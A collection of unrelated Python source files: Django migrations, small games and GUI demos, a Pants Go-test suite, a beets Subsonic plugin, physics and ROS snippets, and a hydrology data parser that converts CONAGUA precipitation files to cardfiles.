('customer', models.BooleanField(default=True)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='profile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='custom_user.User'),
),
]
|
import forca
import adivinhacao
print(14*"*")
print("Bem vindo a minha biblioteca de jogos!")
print(14*"*")
print("""----Escolha o jogo----
(1) Forca (2) Advinhação""")
escolha_jogo = int(input("Escolha: "))
if (escolha_jogo == 1):
forca.jogar()
elif(escolha_jogo == 2):
adivinhacao.jogar()
|
import datetime
import time
from sawtooth_sdk.processor.handler import TransactionHandler
from sawtooth_sdk.processor.exceptions import InvalidTransaction
SYNC_TOLERANCE = 60 * 5
def is_active(record):
    return max(record.infos, key=lambda obj: obj.timestamp).active
def validate_timestamp(timestamp):
"""Validates that the client submitted timestamp for a transaction is not
greater than current time, within a tolerance defined by SYNC_TOLERANCE
NOTE: Timestamp validation can be challenging since the machines that are
submitting and validating transactions may have different system times
"""
dts = datetime.datetime.utcnow()
current_time = round(time.mktime(dts.timetuple()) + dts.microsecond / 1e6)
if (timestamp - current_time) > SYNC_TOLERANCE:
raise InvalidTransaction(
'Timestamp must be less than local time.'
' Expected {0} in ({1}-{2}, {1}+{2})'.format(
timestamp, current_time, SYNC_TOLERANCE))
def validate_record(record):
latest_state = max(record.infos, key=lambda obj: obj.timestamp)
return latest_state
def validate_issuer(state, issuer_public_key):
pass
def latest_manager_public_key_record(record):
return max(record.managers, key=lambda obj: obj.timestamp).manager_public_key
def _validate_manager(signer_public_key, record):
pass
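# --- Illustrative sketch (not part of the original module) ---
# A minimal example of how validate_timestamp behaves; the values are made up,
# and the current time is computed the same way as inside the function.
if __name__ == '__main__':
    dts = datetime.datetime.utcnow()
    now = round(time.mktime(dts.timetuple()) + dts.microsecond / 1e6)
    validate_timestamp(now)  # within tolerance, no exception
    try:
        validate_timestamp(now + SYNC_TOLERANCE + 60)  # too far in the future
    except InvalidTransaction as err:
        print(err)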
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import textwrap
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.goals.test import GoTestFieldSet, GoTestRequest
from pants.backend.go.goals.test import rules as test_rules
from pants.backend.go.goals.test import transform_test_args
from pants.backend.go.target_types import GoModTarget, GoPackageTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
build_pkg_target,
first_party_pkg,
go_mod,
implicit_linker_deps,
import_analysis,
link,
sdk,
tests_analysis,
third_party_pkg,
)
from pants.backend.go.util_rules.sdk import GoSdkProcess
from pants.core.goals.test import TestResult, get_filtered_environment
from pants.core.target_types import FileTarget
from pants.core.util_rules import source_files
from pants.engine.addresses import Address
from pants.engine.process import ProcessResult
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*test_rules(),
*assembly.rules(),
*build_pkg.rules(),
*build_pkg_target.rules(),
*first_party_pkg.rules(),
*go_mod.rules(),
*link.rules(),
*import_analysis.rules(),
*implicit_linker_deps.rules(),
*sdk.rules(),
*target_type_rules.rules(),
*tests_analysis.rules(),
*third_party_pkg.rules(),
*source_files.rules(),
get_filtered_environment,
QueryRule(TestResult, [GoTestRequest.Batch]),
QueryRule(ProcessResult, [GoSdkProcess]),
],
target_types=[GoModTarget, GoPackageTarget, FileTarget],
)
rule_runner.set_options(["--go-test-args=-v -bench=."], env_inherit={"PATH"})
return rule_runner
def test_transform_test_args() -> None:
assert transform_test_args(["-v", "--", "-v"], timeout_field_value=None) == (
"-test.v",
"--",
"-v",
)
assert transform_test_args(["-run=TestFoo", "-v"], timeout_field_value=None) == (
"-test.run=TestFoo",
"-test.v",
)
assert transform_test_args(["-run", "TestFoo", "-foo", "-v"], timeout_field_value=None) == (
"-test.run",
"TestFoo",
"-foo",
"-test.v",
)
assert transform_test_args(["-timeout=1m", "-v"], timeout_field_value=None) == (
"-test.timeout=1m",
"-test.v",
)
assert transform_test_args(["-timeout", "1m", "-v"], timeout_field_value=None) == (
"-test.timeout",
"1m",
"-test.v",
)
assert transform_test_args(["-v"], timeout_field_value=100) == ("-test.v", "-test.timeout=100s")
assert transform_test_args(["-timeout=1m", "-v"], timeout_field_value=100) == (
"-test.timeout=1m",
"-test.v",
)
assert transform_test_args(["-timeout", "1m", "-v"], timeout_field_value=100) == (
"-test.timeout",
"1m",
"-test.v",
)
def test_all_the_tests_are_successful(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
func Add(x, y int) int {
return add(x, y)
}
"""
),
"foo/fib.go": textwrap.dedent(
"""
package foo
func Fib(n int) int {
if n < 2 {
return n
}
return Fib(n-1) + Fib(n-2)
}
"""
),
"foo/internal_test.go": textwrap.dedent(
"""
package foo
import (
"fmt"
"testing"
)
func TestAddInternal(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
func BenchmarkAddInternal(b *testing.B) {
for n := 0; n < b.N; n++ {
Fib(10)
}
}
func ExamplePrintInternal() {
fmt.Println("foo")
// Output: foo
}
"""
),
"foo/external_test.go": textwrap.dedent(
"""
package foo_test
import (
"foo"
"fmt"
"testing"
)
func TestAddExternal(t *testing.T) {
if foo.Add(2, 3) != 5 {
t.Fail()
}
}
func BenchmarkAddExternal(b *testing.B) {
for n := 0; n < b.N; n++ {
foo.Fib(10)
}
}
func ExamplePrintExternal() {
fmt.Println("foo")
// Output: foo
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
print(f"stdout:\n{result.stdout}\nstderr:\n{result.stderr}")
assert "PASS: TestAddInternal" in result.stdout
assert "PASS: ExamplePrintInternal" in result.stdout
assert "BenchmarkAddInternal" in result.stdout
assert "PASS: TestAddExternal" in result.stdout
assert "PASS: ExamplePrintExternal" in result.stdout
assert "BenchmarkAddExternal" in result.stdout
def test_internal_test_fails(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/bar_test.go": textwrap.dedent(
"""
package foo
import "testing"
func TestAdd(t *testing.T) {
t.Fail()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "FAIL: TestAdd" in result.stdout
def test_internal_test_with_test_main(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add_test.go": textwrap.dedent(
"""
package foo
import (
"fmt"
"testing"
)
func TestAdd(t *testing.T) {
t.Fail()
}
func TestMain(m *testing.M) {
fmt.Println("foo.TestMain called")
m.Run()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "foo.TestMain called" in result.stdout
assert "FAIL: TestAdd" in result.stdout
def test_internal_test_fails_to_compile(rule_runner: RuleRunner) -> None:
"""A compilation failure should not cause Pants to error, only the test to fail."""
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
# Test itself is bad.
"foo/bad_test.go": "invalid!!!",
# A dependency of the test is bad.
"foo/dep/f.go": "invalid!!!",
"foo/dep/BUILD": "go_package()",
"foo/uses_dep/BUILD": "go_package()",
"foo/uses_dep/f_test.go": textwrap.dedent(
"""
package uses_dep
import (
"foo/dep"
"testing"
)
func TestAdd(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "bad_test.go:1:1: expected 'package', found invalid\n" in result.stderr
tgt = rule_runner.get_target(Address("foo/uses_dep"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "dep/f.go:1:1: expected 'package', found invalid\n" in result.stderr
def test_external_test_fails(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func Add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo_test
import (
_ "foo"
"testing"
)
func TestAdd(t *testing.T) {
t.Fail()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo", generated_name="./"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "FAIL: TestAdd" in result.stdout
def test_external_test_with_test_main(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func Add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo_test
import (
"foo"
"fmt"
"testing"
)
func TestAdd(t *testing.T) {
if foo.Add(2, 3) != 5 {
t.Fail()
}
}
func TestMain(m *testing.M) {
fmt.Println("foo_test.TestMain called")
m.Run()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo", generated_name="./"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "foo_test.TestMain called" in result.stdout
def test_both_internal_and_external_tests_fail(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func Add(x, y int) int {
return x + y
}
"""
),
"foo/add_int_test.go": textwrap.dedent(
"""
package foo
import (
"testing"
)
func TestAddInternal(t *testing.T) {
t.Fail()
}
"""
),
"foo/add_ext_test.go": textwrap.dedent(
"""
package foo_test
import (
_ "foo"
"testing"
)
func TestAddExternal(t *testing.T) {
t.Fail()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "FAIL: TestAddInternal" in result.stdout
assert "FAIL: TestAddExternal" in result.stdout
@pytest.mark.no_error_if_skipped
def test_fuzz_target_supported(rule_runner: RuleRunner) -> None:
go_version_result = rule_runner.request(
ProcessResult, [GoSdkProcess(["version"], description="Get `go` version.")]
)
if "go1.18" not in go_version_result.stdout.decode():
pytest.skip("Skipping because Go SDK is not 1.18 or higher.")
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/fuzz_test.go": textwrap.dedent(
"""
package foo
import (
"testing"
)
func FuzzFoo(f *testing.F) {
f.Add("foo")
f.Fuzz(func(t *testing.T, v string) {
if v != "foo" {
t.Fail()
}
})
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "PASS: FuzzFoo" in result.stdout
def test_extra_env_vars(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": textwrap.dedent(
"""
go_mod(name='mod')
go_package(
test_extra_env_vars=(
"GO_PACKAGE_VAR_WITHOUT_VALUE",
"GO_PACKAGE_VAR_WITH_VALUE=go_package_var_with_value",
"GO_PACKAGE_OVERRIDE_WITH_VALUE_VAR=go_package_override_with_value_var_override",
)
)
"""
),
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
import "os"
func envIs(e, v string) bool {
return (os.Getenv(e) == v)
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo
import "testing"
func TestEnvs(t *testing.T) {
if !envIs("ARG_WITH_VALUE_VAR", "arg_with_value_var") {
t.Fail()
}
if !envIs("ARG_WITHOUT_VALUE_VAR", "arg_without_value_var") {
t.Fail()
}
if !envIs("GO_PACKAGE_VAR_WITH_VALUE", "go_package_var_with_value") {
t.Fail()
}
if !envIs("GO_PACKAGE_VAR_WITHOUT_VALUE", "go_package_var_without_value") {
t.Fail()
}
if !envIs("GO_PACKAGE_OVERRIDE_WITH_VALUE_VAR", "go_package_override_with_value_var_override") {
t.Fail()
}
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
rule_runner.set_options(
args=[
"--go-test-args=-v -bench=.",
'--test-extra-env-vars=["ARG_WITH_VALUE_VAR=arg_with_value_var", "ARG_WITHOUT_VALUE_VAR", "GO_PACKAGE_OVERRIDE_ARG_WITH_VALUE_VAR"]',
],
env={
"ARG_WITHOUT_VALUE_VAR": "arg_without_value_var",
"GO_PACKAGE_VAR_WITHOUT_VALUE": "go_package_var_without_value",
"GO_PACKAGE_OVERRIDE_WITH_VALUE_VAR": "go_package_override_with_value_var",
},
env_inherit={"PATH"},
)
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "PASS: TestEnvs" in result.stdout
def test_skip_tests(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"f_test.go": "",
"BUILD": textwrap.dedent(
"""\
go_package(name='run')
go_package(name='skip', skip_tests=True)
"""
),
}
)
def is_applicable(tgt_name: str) -> bool:
tgt = rule_runner.get_target(Address("", target_name=tgt_name))
return GoTestFieldSet.is_applicable(tgt)
assert is_applicable("run")
assert not is_applicable("skip")
def test_no_tests(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code is None
def test_compilation_error(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo
import "testing"
!!!
func TestAdd(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "failed to parse" in result.stderr
def test_file_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"f.txt": "",
"BUILD": "file(name='root', source='f.txt')",
"foo/BUILD": textwrap.dedent(
"""
go_mod(name='mod')
go_package(dependencies=[":testdata", "//:root"])
file(name="testdata", source="testdata/f.txt")
"""
),
"foo/go.mod": "module foo",
"foo/foo_test.go": textwrap.dedent(
"""
package foo
import (
"os"
"testing"
)
func TestFilesAvailable(t *testing.T) {
_, err1 := os.Stat("testdata/f.txt")
if err1 != nil {
t.Fatalf("Could not stat foo/testdata/f.txt: %v", err1)
}
_, err2 := os.Stat("../f.txt")
if err2 != nil {
t.Fatalf("Could not stat f.txt: %v", err2)
}
}
"""
),
"foo/testdata/f.txt": "",
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
def test_profile_options_write_results(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo
import "testing"
func TestAdd(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
"""
),
}
)
rule_runner.set_options(
[
"--go-test-args=-v -bench=.",
"--go-test-block-profile",
"--go-test-cpu-profile",
"--go-test-mem-profile",
"--go-test-mutex-profile",
"--go-test-trace",
],
env_inherit={"PATH"},
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "PASS: TestAdd" in result.stdout
extra_output = result.extra_output
assert extra_output is not None
assert sorted(extra_output.files) == [
"block.out",
"cpu.out",
"mem.out",
"mutex.out",
"test_runner",
"trace.out",
]
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Updates Subsonic library on Beets import
Your Beets configuration file should contain
a "subsonic" section like the following:
subsonic:
url: https://mydomain.com:443/subsonic
user: username
pass: password
auth: token
For older Subsonic versions, token authentication
is not supported, use password instead:
subsonic:
url: https://mydomain.com:443/subsonic
user: username
pass: password
auth: pass
"""
import hashlib
import random
import string
import requests
from binascii import hexlify
from beets import config
from beets.plugins import BeetsPlugin
__author__ = 'https://github.com/maffo999'
class SubsonicUpdate(BeetsPlugin):
def __init__(self):
super().__init__()
# Set default configuration values
config['subsonic'].add({
'user': 'admin',
'pass': 'admin',
'url': 'http://localhost:4040',
'auth': 'token',
})
config['subsonic']['pass'].redact = True
self.register_listener('database_change', self.db_change)
self.register_listener('smartplaylist_update', self.spl_update)
def db_change(self, lib, model):
self.register_listener('cli_exit', self.start_scan)
def spl_update(self):
self.register_listener('cli_exit', self.start_scan)
@staticmethod
def __create_token():
"""Create salt and token from given password.
:return: The generated salt and hashed token
"""
password = config['subsonic']['pass'].as_str()
# Pick the random sequence and salt the password
r = string.ascii_letters + string.digits
salt = "".join([random.choice(r) for _ in range(6)])
salted_password = password + salt
token = hashlib.md5(salted_password.encode('utf-8')).hexdigest()
# Put together the payload of the request to the server and the URL
return salt, token
@staticmethod
def __format_url(endpoint):
"""Get the Subsonic URL to trigger the given endpoint.
Uses either the url config option or the deprecated host, port,
and context_path config options together.
:return: Endpoint for updating Subsonic
"""
url = config['subsonic']['url'].as_str()
if url and url.endswith('/'):
url = url[:-1]
# @deprecated("Use url config option instead")
if not url:
host = config['subsonic']['host'].as_str()
port = config['subsonic']['port'].get(int)
context_path = config['subsonic']['contextpath'].as_str()
if context_path == '/':
context_path = ''
url = f"http://{host}:{port}{context_path}"
return url + f'/rest/{endpoint}'
def start_scan(self):
user = config['subsonic']['user'].as_str()
auth = config['subsonic']['auth'].as_str()
url = self.__format_url("startScan")
self._log.debug('URL is {0}', url)
self._log.debug('auth type is {0}', config['subsonic']['auth'])
if auth == "token":
salt, token = self.__create_token()
payload = {
'u': user,
't': token,
's': salt,
'v': '1.13.0', # Subsonic 5.3 and newer
'c': 'beets',
'f': 'json'
}
elif auth == "password":
password = config['subsonic']['pass'].as_str()
encpass = hexlify(password.encode()).decode()
payload = {
'u': user,
'p': f'enc:{encpass}',
'v': '1.12.0',
'c': 'beets',
'f': 'json'
}
else:
return
try:
response = requests.get(url, params=payload)
json = response.json()
if response.status_code == 200 and \
json['subsonic-response']['status'] == "ok":
count = json['subsonic-response']['scanStatus']['count']
self._log.info(
f'Updating Subsonic; scanning {count} tracks')
elif response.status_code == 200 and \
json['subsonic-response']['status'] == "failed":
error_message = json['subsonic-response']['error']['message']
self._log.error(f'Error: {error_message}')
else:
self._log.error('Error: {0}', json)
except Exception as error:
self._log.error(f'Error: {error}')
|
# Generated by Django 2.1.3 on 2018-11-21 06:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0010_auto_20181121_1209'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='educations',
field=models.TextField(default='Check'),
preserve_default=False,
),
migrations.AlterField(
model_name='teacher',
name='experiences',
field=models.TextField(default='Add Educations Details'),
),
]
|
import PySimpleGUI as sg, sys
import pandas as pd
df = pd.read_csv(r"C:\Users\avivy\PycharmProjects\pythonProject\pysimplegui\test_for_main.csv", header=None)
first_col = df.iloc[:, 0].values
a = "\n".join(first_col)
print (a)
# Build one checkbox row per CSV value (iterating over the joined string would
# create a checkbox per character).
col = [[sg.Checkbox(f'{i}', enable_events=True, font='consolas 10')]
       for i in first_col]
layout = [[sg.Text('<-- Scroll with Checkbox -->')],
[sg.Column(col, size=(150, 150), scrollable=True)],
[sg.Cancel('Exit')]
]
form = sg.Window('Checkbox practice').Layout(layout)
while True:
event, values = form.Read()
if event == "SELECT ALL":
        # range() excludes the stop value, so the stop must be one past the last checkbox key
for x in range(1, 19):
form.FindElement(x).Update(True)
if event == "DESELECT ALL":
        # range() excludes the stop value, so the stop must be one past the last checkbox key
for x in range(1, 19):
form.FindElement(x).Update(False)
if event == "Exit":
sys.exit()
|
from unittest import TestCase
import phi
from phi import math
from phi.field import CenteredGrid
from phi.geom import Box
from phiml.math import channel, tensor
from phiml.backend import Backend
def simulate_hit(pos, height, vel, angle, gravity=1.):
vel_x, vel_y = math.cos(angle) * vel, math.sin(angle) * vel
height = math.maximum(height, .5)
hit_time = (vel_y + math.sqrt(vel_y**2 + 2 * gravity * height)) / gravity
return pos + vel_x * hit_time, hit_time, height, vel_x, vel_y
def sample_trajectory(pos, height, vel, angle, gravity=1.):
hit, hit_time, height, vel_x, vel_y = simulate_hit(pos, height, vel, angle, gravity)
def y(x):
t = (x.vector[0] - pos) / vel_x
y_ = height + vel_y * t - gravity / 2 * t ** 2
return math.where((y_ > 0) & (t > 0), y_, math.NAN)
return CenteredGrid(y, x=2000, bounds=Box(x=(min(pos.min, hit.min), max(pos.max, hit.max))))
BACKENDS = phi.detect_backends()
class TestThrow(TestCase):
def test_simulate_hit(self):
math.assert_close(10 + math.sqrt(2), simulate_hit(10, 1, 1, 0)[0])
def test_sample_trajectory(self):
sample_trajectory(tensor(10), 1, 1, math.linspace(-math.PI / 4, 1.5, channel(linspace=7)))
def test_gradient_descent(self):
def loss_function(vel):
return math.l2_loss(simulate_hit(10, 1, vel, 0)[0] - 0)
gradient = math.functional_gradient(loss_function)
for backend in BACKENDS:
if backend.supports(Backend.jacobian):
with backend:
vel = 1
for i in range(10):
loss, (grad,) = gradient(vel)
vel = vel - .2 * grad
print(f"vel={vel} - loss={loss}")
math.assert_close(-7.022265, vel)
|
#load_image.py
#Shorthand to load image from assets directory
import os, sys, pygame
def load_image(name):
fullname = os.path.join('assets', name)
try:
image = pygame.image.load(fullname)
except pygame.error, message:
print 'Cannot load image:', name
raise SystemExit, message
image = image.convert()
return image
|
import sympy
def error(f, err_vars=None):
from sympy import Symbol, latex
s = 0
latex_names = dict()
    if err_vars is None:
err_vars = f.free_symbols
for v in err_vars:
err = Symbol('latex_std_' + v.name)
s += f.diff(v)**2 * err**2
latex_names[err] = '\\sigma_{' + latex(v) + '}'
return latex(sympy.sqrt(s), symbol_names=latex_names)
N1, N0 = sympy.var('N_1 N_0')
N = N1 - N0
print('\n\nT = ', N)
print(r'\sigma_T = ', error(N))
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import Int8
if __name__ == "__main__":
rospy.init_node("led7seg_talker")
pub = rospy.Publisher("led7seg", Int8, queue_size=10)
i = 0
rate = rospy.Rate(1)
while not rospy.is_shutdown():
rospy.loginfo("echo "+str(i))
pub.publish(i)
i += 1
if i > 9:
i = 0
rate.sleep()
|
# created by Ryan Spies
# 3/3/2015
# Python 2.7
# Description: parse through a individual CONAGUA csv files to cardfile
# Features: dms to dd conversion
# Plot features: datelocator for axis, subplots, tick label modifications
import os
import sys
import datetime as dt
from datetime import datetime
from dateutil import parser
from dateutil.relativedelta import relativedelta
import numpy as np
import pandas as pd
import collections
import matplotlib.pyplot as plt
plt.ioff()
import matplotlib.dates
os.chdir('../..')
maindir = os.getcwd()
workingdir = maindir + os.sep + 'Calibration_NWS'+ os.sep +'WGRFC_FY2015'+ os.sep +'raw_data'
startTime = datetime.now()
################### user input #########################
variable = 'ptpx' # choices: 'ptpx' or 'temp'
timestep = 'hourly' # choices: 'hourly'
station_plot = 'off' # creates a summary bar plot for each station -> choices: 'on' or 'off'
state = 'MX'
data_files = workingdir + os.sep + 'CONAGUA' +os.sep + 'ptpx' + os.sep + timestep + os.sep
out_dir = workingdir + os.sep + 'CONAGUA' +os.sep + 'ptpx' + os.sep + 'cardfiles'
summary_file = open(workingdir + os.sep + 'CONAGUA_summary_' + variable + '_' + timestep + '.csv','w')
bad_ptpx_file = workingdir + os.sep + 'CONAGUA' + os.sep + 'questionable_ptpx_check_' + timestep + '.txt'
elev_file = workingdir + os.sep + 'CONAGUA' +os.sep + 'station_elev_extract.csv'
########################################################
### read through the metadata file for station info ###
summary_file.write('NAME,SITE_ID,LAT,LON,ELEV,MISSING_DATA,VALID_DATA,YEARS_VALID,PCT_AVAIL,YEAR_START,YEAR_END\n')
### define temp and precip variable info ###
if variable == 'ptpx':
data_type = {'.ptp':'PTPX'}; dim = 'L'; unit = 'IN'; exts = ['.ptp']
thresh = 127.0 # max precip set to 5in/hr
set_miss_dates = [] # set specific dates to missing (if known to be bad precip)
bad_ptpx_summary = open(bad_ptpx_file,'wb')
station_summary = {}; elev_summary = {}
elev_site = open(elev_file,'r') # file generated with ArcGIS "extract multi values to points" tool
for row in elev_site:
spl = row.split(',')
if spl[0] != 'FID':
elev_ft = float(spl[15].rstrip())*3.28084 # GTOP0_1K elevation converted from meters to feet
elev_summary[spl[2]]=("%.0f" % elev_ft)
sys.path.append(os.getcwd() + os.sep + 'Python' + os.sep + 'modules')
import conversions
### loop through data files with 1983-2004 data
for data_file in os.listdir(data_files):
print 'Parsing raw data files...'
read_data = open(data_files + os.sep + data_file,'r')
count_all = 0; count_missing = 0
site_data = {}
site_data_daily = {}
for each in read_data:
count_all += 1
line = each.split(',')
if count_all == 1: # header 1st line
sep1 = line[0].split('(')
name = line[1].rstrip() # station name in header
site_id = line[1].replace('.',"")[:5].upper() # station id (first 5 char)
print site_id
# parse DMS in header line
if count_all == 2:
            sep2 = line[1].replace('\xc2\xb0', ',').replace('\xb0', ',')
sep2 = sep2.replace("'",',')
sep2 = sep2.replace(")",'')
sep2 = sep2.split(',')
sep2 = filter(None,sep2)
            sep3 = line[3].replace('\xc2\xb0', ',').replace('\xb0', ',')
sep3 = sep3.replace("'",',')
sep3 = sep3.replace(")",'')
sep3 = sep3.split(',')
sep3 = filter(None,sep3)
# use conversion module for dms to dd
lon = str("%.3f" % (conversions.dms_to_dd(sep2[0],sep2[1],sep2[2],'W')))
lat = str("%.3f" % (conversions.dms_to_dd(sep3[0],sep3[1],sep3[2],'N')))
station_summary[site_id] = [name,lat,lon,elev_summary[site_id]]
if count_all >= 5:
data = line[6]
date_time = parser.parse(line[1])
if str(data) != '' and str(data) != '\n': # ignore missing data -> filled in below (-999)
if variable == 'ptpx':
if float(data) < thresh and float(data) >= 0.0: # QA/QC bad precip values
if date_time.date() not in set_miss_dates:
site_data[date_time]=[float(data)/25.4]
else:
if float(data) == 0.00:
site_data[date_time]=[float(data)]
if float(data) >= thresh:
bad_ptpx_summary.write(str(site_id) + ' ' + str(date_time) + ' ' + str(data) + '\n')
read_data.close()
print 'Writing data to cardfile...'
# NOTE: UNIX requires a binary file to properly read end line formats - 'wb'
for ext in exts:
print 'Creating -> ' + ext + ' file'
min_date = min(site_data); max_date = max(site_data); iter_date = min_date
# need to be sure that the first data point starts on day 1 hour 1
if iter_date.day != 1 or iter_date.hour != 1:
iter_date = iter_date + relativedelta(months=+1)
iter_date = dt.datetime(iter_date.year,iter_date.month,1,0,0)
min_date = iter_date
month_count = 0; previous_month = 13 # use these for calculating line number for month/year lines
if timestep == 'hourly':
site_label = state + '-' + site_id + '-HLY'
step_time = 1
year_factor = float(24*365)
else:
site_label = state + '-' + site_id + '-DLY'
step_time = 24
year_factor = float(365)
#cardfile = open(out_dir + site_label + '_RAWS.' + str(min_date.month) + str(min_date.year) + '.' + str(max_date.month) + str(max_date.year) + ext,'wb')
cardfile = open(out_dir + os.sep +site_label + '_CONA' + ext,'wb')
###### header info ######
cardfile.write('$ Data provided by CONAGUA\n')
cardfile.write('$ Data processed from hourly text files using python script\n')
cardfile.write('$ Ryan Spies rspies@lynkertech.com\n')
cardfile.write('$ Data Generated: ' + str(datetime.now())[:10] + '\n')
cardfile.write('$\n')
cardfile.write('{:12s} {:4s} {:4s} {:4s} {:2d} {:12s} {:12s}'.format('datacard', data_type[ext], dim,unit,int(step_time),site_label,station_summary[site_id][0].upper()))
cardfile.write('\n')
cardfile.write('{:2d} {:4d} {:2d} {:4d} {:2d} {:8s}'.format(int(min_date.month), int(min_date.year), int(max_date.month),int(max_date.year),1,'F9.2'))
cardfile.write('\n')
###### write formatted data #####
valid_count = 0; miss_count = 0; plot_dict = {}
plot_dict = collections.OrderedDict(plot_dict) # ordered dictionary
while iter_date <= max_date:
if int(iter_date.month) == previous_month:
month_count += 1
else:
month_count = 1
if iter_date in site_data:
